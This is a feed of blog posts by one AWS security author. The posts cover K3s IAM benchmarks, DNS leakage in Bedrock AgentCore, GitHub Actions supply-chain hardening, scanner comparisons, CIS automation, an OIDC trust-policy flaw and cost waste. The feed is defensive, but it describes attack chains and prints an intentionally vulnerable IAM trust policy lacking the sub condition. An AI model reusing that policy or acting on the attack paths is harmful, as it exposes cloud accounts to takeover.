DEV Community: Mariusz Gębala

K3s on AWS in 2026: 4 IAM auth methods benchmarked

Mariusz Gębala — Wed, 06 May 2026 09:41:54 +0000

If you self-host K3s on EC2 and your pods need AWS API access, there are at least 4 distinct ways to wire that up - and most blog posts only cover 1 or 2.

I built all four on the same 3-node cluster, ran 10 cold starts each, then deliberately broke things to record failure modes:

EC2 Instance Profile (default fallback)
IRSA via S3 public bucket (the classic 2021 pattern)
IRSA via CloudFront + custom domain (private bucket, OAC)
IAM Roles Anywhere with self-signed CA (X.509 cert auth)

## 3 things I didn't expect

Setup B (IRSA via S3 public bucket) was actually FASTER than baseline - 2.59s vs 3.18s median for plain Instance Profile. I assumed S3 GET for JWKS would add latency. Regional S3 STS validation beats it.
Caveat: image was :latest, so timings include some kubelet registry digest resolution overhead.

aws_signing_helper serve mode is broken with helper 1.8.2 + current aws-cli + K3s 1.35.4. Returns 400 on the IMDSv2 listing endpoint, botocore overflows on _evaluate_expiration. AWS docs still
describe it as supported. credential-process mode works fine.

Setup C (IRSA via CloudFront) showed bimodal cold start - 3.97s median, 13.68s p95. 2 of 10 runs hit ~13.5s. Hypothesis: CloudFront edge cache cold misses for the JWKS fetch from AWS STS. No direct STS
visibility, inferred from distribution shape.

## Plus 6 failure scenarios

I broke things deliberately and recorded what each setup does when:

K3s service-account-issuer changes (most damaging - instant fail for ALL existing IRSA pods, no cached creds save you)
Clock skew exceeds 5min
IAM Role deleted mid-flight
OIDC Provider deleted
Trust policy :sub mismatch
K8s Secret deleted (Setup D specific)

The error codes are different between scenarios, which actually helps with debugging - useful distinction nobody else seems to document.

Read full

Architecture diagrams, complete decision matrix, raw benchmark CSVs, full Terraform code for all 4 setups:

https://haitmg.pl/blog/self-hosted-k3s-aws-auth-benchmark/

Companion repo: https://github.com/gebalamariusz/lab-irsa-benchmark

AWS Bedrock AgentCore: VPC Mode Still Leaks DNS After Unit 42 Disclosure

Mariusz Gębala — Mon, 27 Apr 2026 10:04:37 +0000

On April 7, 2026, Palo Alto Networks Unit 42 published research about a DNS exfiltration vector in AWS Bedrock AgentCore Code Interpreter. AWS had already shipped fixes during the responsible disclosure window that began in November 2025 - including documentation updates and MMDSv2 defaults from February 14, 2026. By the time the post went public, SANDBOX mode was tightened. But VPC mode without Route 53 Resolver DNS Firewall still leaks DNS (verified April 26, 2026).

Most coverage of the disclosure described two network modes. The Code Interpreter API actually offers three: PUBLIC, SANDBOX, and VPC. They behave very differently.

I spent six hours running every relevant AgentCore network mode through the same isolation tests in eu-central-1 (Frankfurt), with real Code Interpreter sessions, real Python code, and real DNS queries. The results don't match the simplified narrative most vendor blogs are repeating.

SANDBOX has been quietly tightened. PUBLIC mode is wide open. VPC mode without DNS Firewall is the gap that survives.

The paradox that broke my assumptions: I expected VPC mode (no internet gateway, no NAT) to be the most isolated. It is not - for one specific dimension. DNS in a VPC routes to AmazonProvidedDNS, which is a recursive resolver that will resolve any hostname for you, regardless of whether your VPC has internet egress. The DNS query itself (UDP/53) is the exfiltration channel, encoded as a subdomain name routed through DNS to an attacker-controlled authoritative server. TCP never has to leave.

In the full article, I cover:

The three network modes empirically tested with raw JSON output for each (DNS resolution, TCP connectivity, MMDSv2, S3, STS API calls)
Why VPC mode leaks DNS and the AmazonProvidedDNS routing path that makes it possible
Same agent, same code, before and after Route 53 Resolver DNS Firewall - the fix verified end-to-end with output diffs
Defense matrix mapping each mode and protection to "suitable for untrusted input?"
30-line audit script for finding insecure (PUBLIC mode) Code Interpreters across all four AgentCore regions
Lab gotchas AWS docs do not surface: self-referencing security group rule for VPC mode, the undocumented agentic_ai ENI type, asynchronous cleanup that blocks VPC teardown
Cost breakdown: $0.08 total for the six-hour lab in eu-central-1

I did not stand up a malicious DNS server to verify the full exfiltration chain, but every layer the lab measured (DNS resolution + AmazonProvidedDNS forwarding) is open. The fix is not new technology, it is a configuration AWS recommends but most tutorials skip.

Read the full article with the lab journey, JSON evidence, Terraform setup, and defense matrix

Originally published at haitmg.pl.

12 Steps to Secure GitHub Actions After the Trivy Attack

Mariusz Gębala — Wed, 15 Apr 2026 11:32:48 +0000

In March 2026, attackers compromised Trivy - one of the most popular open-source vulnerability scanners - through its GitHub Action. They force-pushed 75 of 76 version tags to malicious commits. AWS credentials, GCP tokens, SSH keys - stolen from every workflow that ran the compromised action. Within five days, the attack cascaded to Docker Hub, VS Code extensions, and PyPI (CVE-2026-33634, CVSS 9.4).

Most teams heard about this in isolation. It wasn't isolated.

I traced the full chain back 16 months - from a Personal Access Token accidentally committed in a SpotBugs workflow (November 2024), through the tj-actions/changed-files mass compromise targeting Coinbase (March 2025, CVE-2025-30066), the AI-augmented Nx/s1ngularity attack (August 2025), and the GhostAction campaign that stole 3,325 secrets from 817 repositories (September 2025) - all the way to the Trivy/TeamPCP attack and the concurrent prt-scan campaign using AI-generated payloads.

The pattern is clear: the pipeline is not the target - your AWS account is.

Every one of these attacks specifically went after cloud credentials. The Trivy payload queried the AWS Instance Metadata Service at 169.254.169.254 and the ECS task metadata endpoint at 169.254.170.2. It wasn't looking for GitHub tokens.

SHA pinning would have stopped the Trivy attack. But SHA pinning is step 1 of 12.

In the full article, I cover:

A complete timeline of CI/CD supply chain attacks from November 2024 to March 2026
12 concrete hardening steps with copy-paste YAML and Terraform code - from SHA pinning and OIDC setup to egress monitoring with StepSecurity Harden-Runner
A prevention matrix showing which step would have stopped which attack
What GitHub is building next - the 2026 Actions Security Roadmap (dependency locking, native egress firewall, immutable actions)

Read the full article with all 12 steps, code examples, and sources

Originally published at haitmg.pl.

5 Open-Source AWS Security CLI Tools Worth Trying in 2026

Mariusz Gębala — Wed, 01 Apr 2026 20:41:15 +0000

TL;DR

In the context of security, even today, there's a shortage of tools for everything. Prowler has a ton of checks. Trivy is the most well-known tool for containers and clouds. CloudFox is a tool for pentesters. Heimdall focuses on IAM privilege escalation. cloud-audit correlates findings, assembles them into a single attack chain, and provides fixes for implementation via Terraform or the CLI.

There's something for everyone - it's important to choose the right one for your work style.

The landscape

Have you ever wondered that in today's technological age, a tool that could do everything for us would be useful? You know, literally everything. We'll wake up in the morning and an automatically generated list will appear on our laptop, like, "Do this project today, use this AI agent, and then we'll post it here and there - it will bring you success, fame, and money." However, I now believe that even the most refined LLM model won't replace creativity and real human needs.

Based on the above, I've concluded that security scanning in AWS isn't as straightforward as it seems. Let's answer the question together - do you know what you want to check and what to do with the results provided in the report?

There are tools that optimize the overview of our environment in terms of breadth - scanning 500+ rules across multiple clouds. Others, however, prepare information for depth optimization, searching in a smaller area but with much greater depth. Still others try to combine both horizons as optimally as possible. Is it possible to create a perfect tool that is free of noise and precisely meets the requirements of every administrator? In my opinion, no.

In this article, I'd like to present five CLI tools that I've personally tested, so I hope to provide an unbiased opinion on them (all as of April 2, 2026). If you want a deeper dive into how Prowler and ScoutSuite stack up against cloud-audit, I wrote a detailed comparison on my blog.

1. Prowler

Stars: over 13k | Checks: >550 (AWS) | Language: Python
GitHub: prowler-cloud/prowler
Install: pip install prowler

Anyone responsible for AWS environment security (and others) is likely familiar with Prowler. It's by far the most popular open-source scanner. 572 AWS checks across 84 services and 41 compliance standards (CIS, SOC 2, HIPAA, PCI-DSS, NIST 800-53, and many more). If your auditor asks, "Are you using Prowler?" - that's a sign that it's popular.

Advantages:

The widest range of compliance among all OSS tools
Multi-cloud: AWS, Azure, GCP, Kubernetes, and others
Active development, large community, commercial support
HTML, CSV, JSON-OCSF, SARIF output

Where are the shortcomings:

Scan time: 10-30 minutes on a standard account (572 checks take time)
Attack path detection exists, but requires Prowler App (self-hosted Docker Compose + Neo4j + Cartography) or paid SaaS. The standard Prowler AWS CLI provides only simple results
Remediation is performed using text hints, not copy-and-paste commands
572 findings can be cumbersome - you need to know which ones are relevant

Best for: Compliance-focused teams that need to check the box for CIS/SOC 2/HIPAA/PCI-DSS.

pip install prowler
prowler aws

2. Trivy

Stars: > 34k | AWS Checks: ~350-450 | Language: Go
GitHub: aquasecurity/trivy
Install: brew install trivy

This is an interesting resource. Trivy was initially designed for container vulnerability scanning, but later expanded to include cloud misconfiguration scanning. A key differentiator is the single binary that covers everything - container images, IaC files (Terraform, CloudFormation), Kubernetes, SBOM, licenses, and active AWS accounts.

What it does well:

A single binary covers containers + IaC + cloud + secrets + SBOM
Fast, Go-based
Huge community (34k stars)
CycloneDX and SPDX output for supply chain

Where it falls short:

AWS cloud scanning seems secondary to container scanning
No attack chain detection - no correlation between findings
Links to documentation pages for fixes, no CLI/Terraform output
AWS CIS compliance limited to versions 1.2 and 1.4 (not 3.0)
The March 2026 supply chain attack (trivy's GitHub Action was compromised for about 12 hours) raised trust issues

Best for: Teams already using Trivy for containers and want a single tool for everything.

trivy aws --region eu-central-1

3. CloudFox

Stars: >2300 | Commands: 24 AWS enumeration modules | Language: Go
GitHub: BishopFox/cloudfox
Install: brew install cloudfox

Here we're dealing with a slightly different type of tool. This isn't a typical scanner, it's a tool for cloud penetration testers. It's a reconnaissance tool that enumerates what an attacker with given credentials can actually do - which roles to assume, which secrets to read, which instances to reach.

What it excels at:

An attacker's perspective, not a defender's checklist
Enumeration across accounts and services
Generates "loot files" - ready-to-use commands that an attacker could run
Good for red teams/penetration

Where it falls short:

No checks, no rules, no findings - just raw enumeration data
No suggestions for remediation or fixes
No compliance framework
No HTML/PDF reports - just table and CSV output
Requires manual analysis to connect facts to attack paths

Best for: Penetration testers and red teams assessing what can actually be accessed with permissions.

cloudfox aws --profile target-account all-checks

4. Heimdall

Stars: >140 | Patterns: >50 IAM escalations, >85 attack chains | Language: Python
GitHub: DenizParlak/heimdall
Install: from source (pip install -e .)

Heimdall primarily focuses on IAM privilege escalation. It checks whether a user with limited privileges could accidentally become an administrator. It maps trust relationships between IAM roles, policies, and services to find multi-hop escalation paths (A assumes B, B has a PassRole to C, C is an administrator).

What it does well:

Focuses on a difficult problem (privilege escalation) that most scanners miss
Over 85 attack chain patterns with MITRE ATT&CK mapping
Multi-hop detection (not just direct admin access)
Interactive terminal user interface
Ability to scan Terraform before deployment

Where it falls short:

Last commit: December 2025 (appears outdated)
No pip installation - cloning and installing from source required
Lack of compliance frameworks (CIS, SOC 2, etc.)
No remediation commands
Small community (146 stars, 4 commits)
AWS only

Best for: IAM-focused security reviews where the question "who can become an admin?" needs to be answered.

git clone https://github.com/DenizParlak/heimdall
cd heimdall && pip install -e .
heimdall scan

5. cloud-audit

Stars: >30 | Checks: 80 | Language: Python
GitHub: gebalamariusz/cloud-audit
Install: pip install cloud-audit
Website: haitmg.pl/cloud-audit

I created this tool. I tried to gather everything I needed most for my work. I used to conduct the same security reviews at AWS, but I was missing one tool that would truly streamline my work, hence the idea. I needed a scanner that would show how findings connect to actual attack paths, not just a flat list.

What it does well:

20 attack chain rules that correlate findings (e.g., public SG + IMDSv1 + admin role = account takeover path)
Each finding includes AWS CLI + Terraform remediation code, not just descriptions
Compliance with AWS CIS v3.0 (62 checks) and SOC 2 Type II (43 criteria) with evidence for each check
Breach cost estimation per finding and attack chain (sources cited: IBM, Verizon DBIR)
Scan diff to track drift between runs
MCP server for AI agent integration (Claude, Cursor)
Under 60 seconds on a standard account

Where it falls short:

80 checks compared to 572 in Prowler - smaller coverage
AWS only
Small community (31 stars)
Newer and less battle-tested
No multi-cloud

Best for: Teams that need fewer, high-signal findings with attack context and ready-to-paste fixes.

If you want to see it in action, here's a 4-minute walkthrough on YouTube where I scan a real AWS account and find 3 attack chains.

pip install cloud-audit
cloud-audit scan -R

Side-by-side comparison

	Prowler	Trivy	CloudFox	Heimdall	cloud-audit
AWS checks	572	~400	24 commands	50+ patterns	80
Attack chains	App only	No	No	Yes (85+)	Yes (20)
Remediation	Text	Doc links	No	No	CLI + Terraform
Compliance	41 frameworks	CIS 1.2/1.4	None	MITRE only	CIS v3.0, SOC 2
Multi-cloud	Yes (12+)	Yes	Yes (3)	No	No
Scan time	10-30 min	2-5 min	1-3 min	1-2 min	<60 sec
Output	HTML, CSV, SARIF, JSON	Table, SARIF, SPDX	Table, CSV, JSON	SARIF, CSV, JSON	HTML, SARIF, JSON, MD
Cost estimation	No	No	No	No	Yes

What I would actually use

For a compliance audit: Prowler. Nothing else comes close on framework coverage.

For a pentest: CloudFox. It thinks like an attacker.

For container + cloud in one pipeline: Trivy. Single binary, single CI step.

For a quick "what can an attacker actually do with my account": cloud-audit or Heimdall. Depends on whether you want IAM escalation depth (Heimdall) or broader attack chains with fixes (cloud-audit).

There is no reason to pick just one. I run Prowler for compliance evidence and cloud-audit for the attack chain context and fix code. They complement each other.

If you're looking for a more detailed breakdown of how these tools compare on specific AWS security checks, I covered that in my AWS Security Scanners Compared article. And if you're setting up security scanning in CI/CD, check out the AWS Security Audit Checklist for a step-by-step approach.

Tools and star counts verified as of April 2026. Check each project's GitHub for the latest.

CIS AWS v3.0 in 60 Seconds: Automate Compliance with Terraform

Mariusz Gębala — Fri, 27 Mar 2026 11:00:21 +0000

TL;DR: I've implemented a compliance engine into the cloud-audit tool that maps 62 CIS AWS v3.0 controls to automated checks with per-control Terraform remediation. Simply run cloud-audit scan --compliance cis_aws_v3 to quickly obtain the results. The HTML report clearly describes which controls passed and which failed, and also provides Terraform code snippets for quick fixes. 55 of the 62 controls are fully automated. Disclosure: I am the author of cloud-audit.

What is the CIS AWS Foundations Benchmark?

The CIS Amazon Web Services Foundations Benchmark is a comprehensive list of security configuration recommendations published by the Center for Internet Security. Version 3.0.0 includes 62 recommendations that define the baseline security posture every AWS account should meet. Generally, this is the most frequently cited AWS security standard, often used during audits, and is certainly required by compliance programs such as ISO 27001, SOC 2, and BSI C5.

The problem with CIS compliance today

Are you preparing for your first audit? Or perhaps you've already experienced it firsthand? Simply put, you open a 200-page PDF and just want to pass the certification audit. You have to manually review every control element, navigate the AWS console from left to right, top to bottom, run a multitude of CLI commands (not everything is easily accessible from the console), and finally, record all your observations in Excel. Sounds like a "very interesting" job, right? If you have 62 of these controls, you can safely assume you'll have 2-3 days off.

An audit arrives. The auditor asks, "Show me the proof for control element 3.4." You think, "It's already happening." I had it on my screenshot number 248. Either you have a brilliant mind and remember everything, or it will take you another few days to point out all this evidence for the auditor.

And you're probably guessing that I'm not the first person to have the idea - we need to automate this. AWS Security Hub maps 37 controls. Prowler all of them. However, none of them answer the question of how to fix them (at least not by copy-pasting).

I've participated in security audits in my life, including those involving AWS. This definitely inspired me to work on fully automating this process.

What CIS AWS v3.0 actually requires

The CIS AWS Foundations Benchmark v3.0.0 has 62 recommendations across 5 sections:

Section	Controls	What it covers
1 - Identity and Access Management	22	Root MFA, password policies, access keys, IAM roles, Access Analyzer
2 - Storage	9	S3 encryption, public access blocks, RDS encryption, EFS encryption
3 - Logging	9	CloudTrail, AWS Config, VPC flow logs, S3 object-level logging
4 - Monitoring	16	CloudWatch metric filters + alarms for 15 event categories + Security Hub
5 - Networking	6	Security groups, NACLs, default SG, IMDSv2

Of these 62, 55 are automatable via AWS API calls. 7 require manual review (console-only settings, organizational decisions).

Automating the benchmark

cloud-audit v1.1.0 includes a compliance engine that maps all 62 CIS AWS Foundations Benchmark v3.0 controls to automated checks:

pip install cloud-audit
cloud-audit scan --compliance cis_aws_v3

The output shows a per-control table with PASS, FAIL, PARTIAL, or N/A for each of the 62 controls:

Compliance Assessment
CIS Amazon Web Services Foundations Benchmark v3.0.0

Readiness: 45%  (25/55 assessed controls passing)
Coverage: 62 controls total, 55 assessed, 7 not assessed

 Status  ID      Title                                          Checks
 PASS    1.4     Ensure no root access key exists                  1/1
 PASS    1.5     Ensure MFA is enabled for root                    1/1
 FAIL    1.6     Ensure hardware MFA for root                      0/1
 FAIL    1.8     Ensure password policy min length 14              0/1
 ...

For the HTML report with full evidence and remediation:

cloud-audit scan --compliance cis_aws_v3 --format html -o cis-report.html

What the compliance report includes

Each failing control shows:

Evidence statement - what was checked, what was found
AWS CLI remediation - the exact command to fix it
Terraform code - HCL you can copy into your infrastructure
AWS documentation link - the official reference
Attack chain context - if the failure is part of an exploitable attack path

For example, a failing CIS 1.8 (password policy) shows:

resource "aws_iam_account_password_policy" "strict" {
  minimum_password_length      = 14
  require_lowercase_characters = true
  require_uppercase_characters = true
  require_numbers              = true
  require_symbols              = true
  password_reuse_prevention    = 24
}

Attack chains in compliance context

Individual CIS benchmark checks operate in isolation. However, the key issue is the combination of failing controls, as these create vulnerable attack paths. Individual findings alone aren't as bad as their combination. Based on findings, the tool can route results to 20 attack chain rules (describing precisely which ones are included).

For example, if CIS 1.5 (root MFA) fails AND CIS 3.1 (CloudTrail), the scanner will detect error AC-09: Unmonitored administrator access - root has no MFA and there is no audit trail.

This gives auditors and auditees something CIS checklists don't offer: a risk prioritization view indicating which failures are most important.

How it compares to other tools

Capability	AWS Security Hub	Prowler (OSS)	cloud-audit
CIS v3.0 controls	37 automated	62	62 (55 automated)
Remediation per control	No	CIS only	Every control (CLI + Terraform)
Attack chain detection	No	Paid App only	20 rules (free)
Cost	~$0.001/check	Free	Free

What is next

CIS is the first framework. SOC 2, BSI C5, ISO 27001, HIPAA, and NIS2 are planned.

Full documentation: haitmg.pl/cloud-audit

GitHub: github.com/gebalamariusz/cloud-audit

Have you automated your CIS compliance process? What tools are you using? I'd love to hear about your experience in the comments.

Prowler vs ScoutSuite vs cloud-audit [2026]

Mariusz Gębala — Wed, 18 Mar 2026 14:17:03 +0000

As of 2026, we can find many open source tools that scan AWS accounts for potentially unsafe configurations. Anyone who cares about the security of their AWS infrastructure has likely already searched for such tools and stumbled upon Prowler, ScoutSuite, Trivy, Steampipe, and a few others while browsing "best tools" rankings.

I've used most of them myself. I've seen both pros and cons. This prompted me to dedicate the time to creating my own scanner. In this post, I'd like to compare three CLI-based scanners - Prowler, ScoutSuite, and Cloud-Audit (my tool). I'll try to be as objective as possible, but I'll let the comparison speak for itself.

Each solves different problems at different scales. I'll point out where each scanner fits and where it doesn't.

Originally published at haitmg.pl

Read the full article with comparison table and code examples on haitmg.pl

I Audit AWS Accounts. 8 Out of 10 Have This GitHub Actions Backdoor.

Mariusz Gębala — Mon, 16 Mar 2026 11:17:54 +0000

TL;DR: Configuring GitHub Actions OIDC is very convenient and useful, but often dangerous. If you didn't consider one specific IAM requirement and created a role before June 2025, you're almost certainly vulnerable to an attack that would allow ANY GitHub repository to assume your AWS deployment role.

The title sounds scary and clickbait, right? Unfortunately, only the second part of the question is false. It's not clickbait. Last week, Google published details about a threat group called UNC6426. A single compromised npm package allowed access to full AWS admin within 72 hours. How was this possible? Well, a poisoned npm package stole the developer's GitHub token. From there, the path was clear - going directly to production on AWS, password-free and alert-free.

The door they used? It's probably open in your account right now.

How a single npm install led to AWS admin

Let's take a look at the attack process and try to understand it in simple terms. One developer came to work on Monday morning and made a to-do list for the day. The first task required installing an npm package, just like any other, from a trusted registry. The problem was that this package contained a credential-stealing script called QUIETVAULT. It worked by silently extracting the developer's personal GitHub token.

The attackers intercepted the token and easily used it to gain access to the organization's GitHub repository. The next step was to use the open-source Nord Stream tool to extract secrets from CI/CD. Further, after searching, they found the GitHub Actions workflow deployed to AWS using OIDC. OIDC is a "modern" and secure authentication method without the need to store access keys.

Sound bad? We're just getting started. The AWS rule used by GitHub Actions was configured so that any GitHub repo could use it. ALL of them, not just those belonging to the organization.

So what did the attackers do with this? They generated temporary AWS credentials by exploiting a misconfigured OIDC. Next, CloudFormation was deployed with the ability to create a completely new IAM role with admin access. There were no login credentials? So they created their own.

All this took less than 72 hours.

Datadog Security Labs detected over 500 roles with the exact same misconfiguration across ~275 AWS accounts. You know how? By scanning public GitHub workflows. One of them belonged to the British government's digital service...

What's OIDC and why should you care

Anyone with a passing understanding of security knows to use OIDC when connecting GitHub Actions to AWS. This approach allows communication without the need to store long-term confidential information. And that's great, that's the point. It just needs to be configured correctly.

You're only as secure as your permission rules that control who can use them. Configuring them incorrectly? You've left the door wide open to a potential burglar.

Consider a real-life analogy. You installed the most armor-resistant door in your house. Not even an explosive device can break it down. And then you hung the key to that door on the doorknob.

The vulnerability - one missing line

Here's what I find in roughly 8 out of 10 client accounts. Look at the Condition block:

"Condition": {
  "StringEquals": {
    "token.actions.githubusercontent.com:aud": "sts.amazonaws.com"
  }
}

Professional and secure, eh? Well, almost, because there's only one condition to check - audience. This only confirms that the token is intended for AWS, but does it mention who's presenting it?

Now look at the secure version:

"Condition": {
  "StringEquals": {
    "token.actions.githubusercontent.com:aud": "sts.amazonaws.com",
    "token.actions.githubusercontent.com:sub": "repo:my-org/my-repo:ref:refs/heads/main"
  }
}

One line. Adding the sub claim condition locks the role down to a specific repository and branch.

Without that, you can think of it like this: you go to a concert, go through a series of personal checks, and then hand in your ticket for verification. The security guard looks at you - you have a ticket, come on in. He just didn't check if it was a ticket for this concert...

Check your account in 60 seconds

Stop reading and run this. Find all roles that trust GitHub's OIDC provider but are missing the sub condition:

aws iam list-roles --output json | jq -r '
  .Roles[]
  | select(
      .AssumeRolePolicyDocument.Statement[]
      | select(.Principal.Federated? // empty
        | endswith("token.actions.githubusercontent.com"))
      | (.Condition.StringEquals["token.actions.githubusercontent.com:sub"] //
         .Condition.StringLike["token.actions.githubusercontent.com:sub"]) == null
    )
  | "\(.RoleName) -- VULNERABLE"'

If you see output - you have a problem.

To inspect a specific role:

aws iam get-role --role-name YOUR_ROLE_NAME \
  --query 'Role.AssumeRolePolicyDocument' --output json | jq .

No sub condition in the output = vulnerable.

The Terraform fix

Don't use jsonencode() for this policy. Duplicate map keys in HCL silently overwrite each other - this exact bug hit the UK Government Digital Service. Use aws_iam_policy_document instead:

data "aws_iam_policy_document" "github_actions_trust" {
  statement {
    effect  = "Allow"
    actions = ["sts:AssumeRoleWithWebIdentity"]

    principals {
      type        = "Federated"
      identifiers = [aws_iam_openid_connect_provider.github.arn]
    }

    condition {
      test     = "StringEquals"
      variable = "token.actions.githubusercontent.com:aud"
      values   = ["sts.amazonaws.com"]
    }

    condition {
      test     = "StringLike"
      variable = "token.actions.githubusercontent.com:sub"
      values   = ["repo:YOUR_ORG/YOUR_REPO:ref:refs/heads/main"]
    }
  }
}

resource "aws_iam_role" "github_actions" {
  name               = "GitHubActionsRole"
  assume_role_policy = data.aws_iam_policy_document.github_actions_trust.json
}

Two separate condition blocks. No silent overwrites. No surprises.

What AWS fixed (and what they didn't)

Back in June 2025, AWS introduced an additional security measure that blocks the creation of new roles without this condition. If you configure it incorrectly, it's an error.

That's probably a no-brainer, right?

No, exactly. This security measure only applies to new roles. Pay attention to your OIDC roles created before June 2025. If you didn't fix it yourself, AWS didn't fix it for you either.

Did someone already exploit this?

If you use CloudTrail Lake, run this query to find any role assumptions from repos outside your organization:

SELECT eventTime, userIdentity.username AS github_subject,
       sourceIPAddress
FROM <your-event-data-store-id>
WHERE eventSource = 'sts.amazonaws.com'
  AND eventName = 'AssumeRoleWithWebIdentity'
  AND userIdentity.username NOT LIKE 'repo:YOUR-GITHUB-ORG/%'

If you see results - someone outside your org already used your role. Time to rotate credentials and check what they accessed.

One more thing

I'm currently working on additional functionality to detect this configuration in my AWS cloud-audit security scanner (it's completely open source). Any detection of this error will be included in a report, along with comments on how to fix it. If you'd like, please add a star to the repo; it will help me develop and encourage further work.

This year, I've audited dozens of accounts, and the ratio of vulnerable to secure is alarming - I bet most of you won't like the answer.

Sources: Datadog Security Labs, Google Cloud Threat Horizons H1 2026, AWS Security Blog, Wiz Blog

AWS Cost Waste: 5 Things I Find in Every Audit

Mariusz Gębala — Fri, 13 Mar 2026 22:08:57 +0000

AWS cost waste is money spent on cloud resources that deliver zero value - orphaned volumes, logs stored forever, idle databases, and infrastructure nobody remembers deploying. In most accounts, it adds up to 27-35% of the total bill.

#	Waste pattern	Typical annual cost	Fix effort
1	Orphaned EBS volumes	$2,000+ per TB	1 Terraform line
2	CloudWatch logs without retention	15% of monthly bill	1 CLI command per log group
3	Unnecessary NAT Gateways	$1,166/year per 3-AZ setup	Conditional Terraform
4	gp2 volumes instead of gp3	20% of EBS spend	In-place migration, zero downtime
5	Over-provisioned RDS	$350+/month per idle instance	Environment-aware sizing

According to a Flexera report, organizations waste 27% of their cloud spending. I have mixed feelings about this. In the audits I've conducted throughout my career, the result has more often been closer to 35%. Never mind the numbers. More important is the fact that almost no one notices wasted money until they actually check it.

Interestingly, these aren't some exotic edge cases. The same pattern usually repeats itself - five similar problems for every customer. In this article, I present a list of the most common cases.

1. Orphaned EBS volumes

Did you have EC2 for testing? Great. Did you test everything you needed to? Even better. Did you shut down the instances? Well, you're clearly a professional who cares about costs. But wait... Did you really select "terminate EBS on shutdown"? Oh, no? And you've probably tested hundreds of instances over the last year? Let's do the math. Let's be optimistic, you had 50 of these instances. The cost is 0.08-0.10 USD per GB per month. Let's not bother with the math; I'll leave that to you.

One audit reported 2.4 TB of orphaned volumes (across three regions). $2.3k just went "into the cloud" and nobody actually noticed. But who's going to stop a rich man?

Find them:

aws ec2 describe-volumes \
  --filters Name=status,Values=available \
  --query 'Volumes[].{ID:VolumeId,Size:Size,Type:VolumeType,Created:CreateTime}' \
  --output table

If that table has more than zero rows, you're paying for storage nobody uses.

Prevent with Terraform:

resource "aws_instance" "app" {
  ami           = var.ami_id
  instance_type = var.instance_type

  root_block_device {
    volume_type           = "gp3"
    delete_on_termination = true  # This is the line that matters
    encrypted             = true
  }
}

One line in your module. That's it. If your Terraform modules don't set this, every terminated instance leaves behind a volume that nobody will ever clean up.

2. CloudWatch logs that never expire

We like having application logs, don't we? Let's log everything: Lambda, all ECS tasks, every API Gateway - EVERYTHING! Retention? And what if, in 15 years, someone asks why that ECS task crashed? Don't set it.

Logs are supposedly just text data. And it's hard to disagree, they are. It's worse when we log absolutely everything to CloudWatch. Although, no, that's not bad. What's bad is when we don't set any retention for those logs. Honestly, do you often find yourself reading logs older than a few days? Okay, that could still happen. But logs from a month ago? Probably once every 5 years would be useful, but even without that, you can survive. But even if you don't review them, remember - you have to pay for all those logs. It seems like peanuts, because it's only $0.03/GB. But they add up faster than you think. I've seen situations where CloudWatch was 15% of the monthly bill.

The conclusion is simple: if you let AWS automatically create log groups (which, contrary to appearances, is the default behavior), retention is infinite. Are you using Terraform? Then use the retention policy and you won't have to worry about unusually high bills.

Find log groups with no retention:

aws logs describe-log-groups \
  --query 'logGroups[?!retentionInDays].{Name:logGroupName,StoredBytes:storedBytes}' \
  --output table

Fix immediately:

# Set 30-day retention on a specific log group
aws logs put-retention-policy \
  --log-group-name "/aws/lambda/my-function" \
  --retention-in-days 30

Prevent with Terraform:

# Create the log group BEFORE the Lambda, so you control retention
resource "aws_cloudwatch_log_group" "lambda" {
  name              = "/aws/lambda/${var.function_name}"
  retention_in_days = 30  # ALWAYS set this
}

3. NAT Gateways nobody needs

Oh, I love this topic. You probably already know that overlay routing helps reduce the already high costs of implementing VM-Series. Just creating a NAT Gateway costs ~33 USD, and not even a single bit has passed through it. And imagine that you have to adhere to HA, meaning you install one NAT Gateway in each AZ, and you have three of them. It costs 100 USD just to install a NAT Gateway. Not to mention that you'll pay 0.045 USD per GB.

You know the problem? Most non-production environments seriously don't need three NAT Gateways. In fact, sometimes they don't need one at all.

Check utilization:

# Check bytes processed by each NAT Gateway over the last 7 days
aws cloudwatch get-metric-statistics \
  --namespace AWS/NATGateway \
  --metric-name BytesOutToDestination \
  --dimensions Name=NatGatewayId,Value=nat-0123456789abcdef0 \
  --start-time $(date -u -d '7 days ago' +%Y-%m-%dT%H:%M:%S) \
  --end-time $(date -u +%Y-%m-%dT%H:%M:%S) \
  --period 604800 \
  --statistics Sum

Prevent with Terraform:

variable "environment" {
  type = string
}

# 1 NAT Gateway in dev/staging, N in production
resource "aws_nat_gateway" "main" {
  count         = var.environment == "prod" ? length(var.azs) : 1
  allocation_id = aws_eip.nat[count.index].id
  subnet_id     = aws_subnet.public[count.index].id
}

It's also worth checking whether your private subnets are using the internet at all. Maybe some of them only communicate with other AWS services? Endpoints are a much cheaper solution than NAT Gateways.

4. gp2 volumes that should be gp3

This topic is also interesting. Basically, there's almost nothing you need to do here, and I see it practically everywhere.

Except I can guess where that comes from. It's common wisdom that newer something (in this case, a higher version is associated with something newer) means more expensive. So, someone who doesn't use AWS every day starts up EC2 and sees the choice between gp2 and gp3 EBS. They think, "I'll go with the older, cheaper one." Mmm... good luck! gp3 is about 20% cheaper than gp2, has 3,000 IOPS and 125 MB/s base throughput. Despite this, according to Datadog's State of Cloud Costs report, gp2 accounts for 58% of EBS spending.

Generally, there's no scenario where gp2 is better - gp3 simply costs less and performs better. That's all.

Find all gp2 volumes:

aws ec2 describe-volumes \
  --filters Name=volume-type,Values=gp2 \
  --query 'Volumes[].{ID:VolumeId,Size:Size,State:State,Instance:Attachments[0].InstanceId}' \
  --output table

Migrate (no downtime):

aws ec2 modify-volume --volume-id vol-0123456789abcdef0 --volume-type gp3

That's it. No shutdowns, no snapshots, no maintenance window. The migration occurs in the background while the volume remains connected and operational.

Prevent with Terraform:

variable "volume_type" {
  type    = string
  default = "gp3"

  validation {
    condition     = var.volume_type != "gp2"
    error_message = "Use gp3 instead of gp2. It's 20% cheaper with better baseline performance."
  }
}

A validation block in the EC2 module rejects gp2 at plan time. This prevents anyone from accidentally deploying a costly option.

5. Over-provisioned RDS instances

Time for dessert. Oh, how many companies are losing real money here. And let me give you an example. We have something to launch in production in eight months, so now let's use exactly the same parameters in the development environment that we'll use in production. So let's take a look at a db.r6g.xlarge instance. Cost? Let's say an average of $350. Needed for development? Yes, the same as a bicycle for a fish.

But this is still a rare case. In production, I've seen more than once someone set up RDS where the average CPU utilization is 5-8%. The last time such a move was in 2008, when the global crisis hit everyone.

Check CPU utilization over the last 14 days:

aws cloudwatch get-metric-statistics \
  --namespace AWS/RDS \
  --metric-name CPUUtilization \
  --dimensions Name=DBInstanceIdentifier,Value=my-database \
